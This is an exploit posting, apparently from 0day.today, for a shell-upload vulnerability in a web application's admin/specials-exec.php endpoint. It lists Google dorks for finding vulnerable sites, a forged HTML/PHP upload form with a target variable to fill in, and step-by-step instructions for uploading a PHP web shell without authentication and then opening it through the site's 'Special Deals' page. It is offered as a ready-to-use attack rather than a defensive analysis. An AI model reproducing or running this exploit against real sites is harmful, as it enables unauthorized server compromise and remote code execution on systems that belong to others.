Specials-Exec Shell Upload Vulnerabilty


<html xmlns="http://www.w3.org/1999/xhtml">
<?php
/*
############################ Specials-Exec Shell Upload Vulnerabilty ############################
###### Dork : Inurl:/admin/specials-exec.php
###### Dork 2 : Inurl:/specials-exec.php

- Create a .html File and Put the Code.
- Navigate the File in your Localhost .
- and upload your Php Shell and you redirect to http://site/script/admin/access-denied.php
- and You get the Message "Access Denied! You do not have access to this
resource." but don't worry. when you get the Message go to Home Site and
click in "Special Deals" and then you can see Promo Photo simply Click in the shell.

#  0day.today [2016-10-30]  #
*/

/// Tools Devleped By #[MK]
$Target = "localhost"; ///// Past Target Vuln Here

?>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Shell Upload</title>
<script language="JavaScript" src="http://<?php echo $Target ;?>/validation/admin.js"></script>
<table width="850" align="center">
<form name="specialsForm" id="specialsForm" action="http://<?php echo $Target ;?>/admin/specials-exec.php" method="post" enctype="multipart/form-data" onsubmit="return specialsValidate(this)">
<tr>
    <th>Name</th>
    <th>Description</th>
    <th>Price</th>
    <th>Start Date</th>
    <th>End Date</th>
    <th>Photo</th>
    <th>Action</th>
</tr>
<tr>
    <td><input type="text" name="name" id="name" class="textfield" /></td><br>
    <td><textarea name="description" id="description" class="textfield" rows="2" cols="15"></textarea></td><br>
    <td><input type="text" name="price" id="price" class="textfield" /></td><br>
    <td><input type="date" name="start_date" id="start_date" class="textfield" /></td><br>
    <td><input type="date" name="end_date" id="end_date" class="textfield" /></td><br>
    <td><input type="file" name="photo" id="photo"/></td><br>
    <td><input type="submit" name="Submit" value="Add" /></td><br>
</tr>
</form>
</table>